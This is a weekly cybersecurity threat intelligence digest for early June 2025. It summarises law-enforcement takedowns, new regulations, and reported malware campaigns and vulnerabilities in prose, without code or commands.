Cyware Weekly Threat Intelligence, June 02–06, 2025
The Good
Authorities have taken down a major hub for stolen financial data. The DOJ seized approximately 145 domains associated with the BidenCash marketplace, which had evolved from a small credit card shop in 2022 into a massive hub for stolen payment data. In a move to reinforce Europe’s cyber defenses, Microsoft is stepping in with strategic support. The newly launched European Security Program offers EU governments free access to AI-driven threat intelligence, vulnerability alerts, and guidance to counter attacks from state-sponsored actors.
The DOJ seized approximately 145 darknet and clear web domains linked to the BidenCash marketplace, which began operations in March 2022. Initially a low-profile credit card shop, BidenCash gained popularity by releasing free promotional dumps. With over 117,000 users, it trafficked over 15 million payment cards and generated $17 million in revenue, distributing 3.3 million stolen cards for free to attract customers. The stolen data included full card details and personal information. Authorities redirected the seized domains to law enforcement servers to prevent future criminal activity.
Microsoft launched a free European Security Program aimed at enhancing cybersecurity for EU governments, particularly against threats from state-sponsored actors in Russia, China, Iran, and North Korea. The program utilizes AI to provide real-time threat intelligence, early warnings, and guidance on vulnerabilities. Microsoft plans to strengthen partnerships with Europol, the CyberPeace Institute, and ISPs to improve threat detection and disrupt cybercrime.
The DOJ, in collaboration with Dutch and Finnish authorities, seized four domains (AvCheck[.]net, Cryptor[.]biz, Cryptor[.]live, and Crypt[.]guru) providing crypting services to cybercriminals. These services help malware evade antivirus detection, enabling unauthorized access to systems. This operation, part of Operation Endgame, aims to dismantle cybercrime networks and follows recent disruptions of other malware like Lumma Stealer.
Australia implemented mandatory ransomware payment reporting rules effective May 30, targeting organizations with an annual turnover of AUS $3 million ($1.93 million) and private critical infrastructure firms. These organizations must report any ransomware payments to the Australian Signals Directorate within 72 hours, detailing the payment amount, method, and communication with attackers. Public sector bodies are exempt, and non-compliance incurs civil penalties. This law, part of the Cyber Security Act 2024, aims to enhance visibility into ransomware incidents and deter payments.
The Bad
Not all GitHub projects are built with good intentions. Researchers uncovered a widespread campaign involving more than 130 repositories booby-trapped with malware disguised as game cheats, hacking tools, and utilities. A free software download could end up costing your entire crypto wallet. ViperSoftX is back in circulation, targeting crypto users with malicious PowerShell scripts bundled into cracked apps, keygens, and torrent packages. Some attackers mine crypto, JINX-0132 mines misconfigurations. This threat actor is running a stealthy cryptojacking campaign against DevOps platforms, exploiting exposed defaults and overlooked RCE flaws.
Hackers exploited a critical vulnerability (CVE-2024-42009) in the Roundcube webmail platform to steal user credentials via a spearphishing campaign targeting Polish entities. This attack, attributed to the UNC1151 threat actor linked to Belarusian and possibly Russian state interests, used XSS to execute malicious JavaScript and register a Service Worker for persistent access. The vulnerability affects Roundcube versions ≤1.5.7 and 1.6.x ≤1.6.7, with a CVSS score of 9.3. Another vulnerability (CVE-2025-49113) allowing remote code execution has been identified but not yet exploited.
Cybersecurity researchers discovered a widespread campaign involving malicious code planted in over 130 open-source GitHub repositories, targeting cybercriminals and gamers. The operation focused on backdoored repositories disguised as game cheats, hacking tools, and other utilities, with malware hidden in obfuscated code. Four types of backdoors were identified: PreBuild, Python, screensaver (.scr), and JavaScript. The campaign employs automated workflows via YAML files to simulate repository maintenance. The threat actor uses Telegram bots for notifications and paste sites for intermediate infection stages.
ViperSoftX malware is actively targeting cryptocurrency users, distributing PowerShell scripts to execute malicious commands, steal cryptocurrency wallets, and deploy additional payloads like Quasar RAT, PureCrypter, and PureHVNC. The malware is distributed via cracked software, key generators, illegal duplication programs, or torrent sites, affecting victims worldwide, including South Korea. ViperSoftX ensures persistence by leveraging task schedulers that execute obfuscated PowerShell scripts and registry-stored commands.
Positive Technologies identified a malicious campaign, "Operation Phantom Enigma," targeting Brazilian users since early 2025. Phishing emails were used to distribute malware disguised as invoices, leading to the installation of malicious browser extensions or RATs. The attackers used PowerShell scripts and BAT files to download and execute malicious extensions, targeting Google Chrome, Microsoft Edge, and Brave browsers.
The FBI issued a Public Service Announcement (PSA) on cybercriminals exploiting NFT airdrops in Hedera Hashgraph non-custodial wallets to defraud users. Scammers embed malicious URLs in transaction memos, social media, phishing emails, or third-party sites, tricking users into sharing login details or seed phrases, enabling cryptocurrency theft. The FBI advises verifying offers, avoiding unsolicited links, and reporting incidents to the IC3 with transaction details.
The threat actor JINX-0132 is behind a widespread cryptojacking campaign targeting popular DevOps applications, including Nomad, Consul, Docker, and Gitea. This campaign exploits known misconfigurations and vulnerabilities in these tools to deploy XMRig mining software on compromised servers. JINX-0132 employs a unique methodology by avoiding traditional IOCs, using off-the-shelf tools downloaded from public GitHub repositories instead of custom malware. They take advantage of Nomad's insecure default configurations, allowing unauthorized users to submit jobs that execute malicious commands. In Gitea, they exploit vulnerabilities such as post-authentication remote code execution, particularly in older versions. Approximately 25% of cloud environments use these technologies, with 5% directly exposed to the internet, and 30% of those misconfigured.
Cybercriminals are redirecting users from gaming sites and social media to fake Booking[.]com websites, employing malicious Captcha forms that trick users into executing harmful commands. This leads to the installation of Backdoor.AsyncRAT, a remote access tool that allows attackers to control infected devices and steal sensitive information. The campaign's URLs change frequently, and users should be wary of any site prompting them to copy commands into their clipboard, as this can result in significant security breaches and financial loss.
Hackers are exploiting the popular SSH client PuTTY to deliver malware on Windows systems. The malware abuses OpenSSH's default behavior and utilizes stealth techniques such as registry manipulation, custom SSH configuration files, and process masquerading to maintain persistence and evade detection. It leverages trusted system binaries like ssh.exe (LOLBIN) and creates invalid SSH configuration files to enable port forwarding and remote access for attackers.
New Threats
Destruction masquerading as maintenance tools is hitting Ukraine’s infrastructure. Researchers attributed a new wiper malware called PathWiper to a Russia-linked APT group, targeting critical systems by leveraging legitimate administrative frameworks. A few swapped letters could be all it takes to get owned. A new supply chain attack targets Python and npm developers through typo-squatting and name confusion. A new Android banking trojan, named Crocodilus, has emerged in the threat landscape. It masquerades as legitimate apps like Google Chrome and uses overlay attacks to steal credentials from financial apps.
A new variant of the Chaos RAT, an open-source remote access trojan written in Golang and inspired by frameworks like Cobalt Strike and Sliver, is actively targeting both Windows and Linux systems. The malware provides a cross-platform administrative panel for payload generation, session management, and control of compromised machines. Chaos RAT is primarily distributed via phishing emails containing malicious links or attachments. Upon execution, it drops a script that modifies the "/etc/crontab" file to establish persistence by periodically fetching the malware. Early campaigns used Chaos RAT mainly for reconnaissance and information gathering, while deploying cryptocurrency miners like XMRig separately.
Cisco Talos identified PathWiper, a destructive wiper malware targeting Ukrainian critical infrastructure, attributed to a Russia-linked APT group. The attackers used a legitimate administrative framework to deploy malicious VBScript and execute the PathWiper executable. PathWiper overwrites storage media and file system artifacts, including MBR and NTFS attributes, with randomized data. The malware demonstrates similarities to HermeticWiper but utilizes more advanced drive enumeration and corruption techniques.
Socket discovered four malicious npm packages—pancake_uniswap_validators_utils_snipe, pancakeswap-oracle-prediction, ethereum-smart-contract, and env-process—that target Binance Smart Chain (BSC) and Ethereum wallets. Created by the threat actor @crypto-exploit, these packages collectively received over 2,100 downloads. The first package, pancake_uniswap_validators_utils_snipe, was designed to drain crypto wallets by exfiltrating up to 85% of their balance using obfuscated JavaScript. The packages utilize environment variables to access sensitive data, including wallet addresses and private keys. The threat actor employs techniques like typosquatting and command obfuscation to evade detection and improve the effectiveness of their attacks.
A new Android banking trojan, Crocodilus, is actively targeting users in Europe, South America, and other regions, leveraging improved obfuscation techniques to evade detection. Initially discovered in March, Crocodilus masquerades as legitimate apps like Google Chrome and uses overlay attacks to steal credentials from financial apps. It also exploits accessibility permissions to extract cryptocurrency wallet seed phrases. Recent campaigns have expanded to countries like Poland, Argentina, Brazil, India, Indonesia, and the U.S., using tactics like fake Facebook ads and malicious websites to distribute the malware. New features include adding fake contacts to victims' contact lists to bypass fraud detection and collecting cryptocurrency wallet seed phrases via an automated parser.
Google has released an emergency update for Chrome to fix a high-severity zero-day vulnerability (CVE-2025-5419) in the V8 JavaScript engine, which is actively being exploited. This marks the third zero-day vulnerability addressed in 2025, following similar issues patched in March and May. Users are encouraged to update their browsers to versions 137.0.7151.68/.69 for Windows/Mac and 137.0.7151.68 for Linux. Detailed information about the exploits will be withheld until a majority of users have applied the fix.
A malicious package campaign targeting Python and npm users was discovered, using typo-squatting and name-confusion attacks on packages like Colorama and Colorizr. The attack involved cross-ecosystem tactics, with payloads allowing remote access and data exfiltration, and attempted to evade detection on Windows systems. The campaign used cross-platform baiting, with payloads for both Windows and Linux. Windows payloads involved environment variable harvesting, persistence through scheduled tasks, and antivirus evasion. Linux payloads included advanced backdoors using encrypted communication and stealth techniques to maintain long-term access.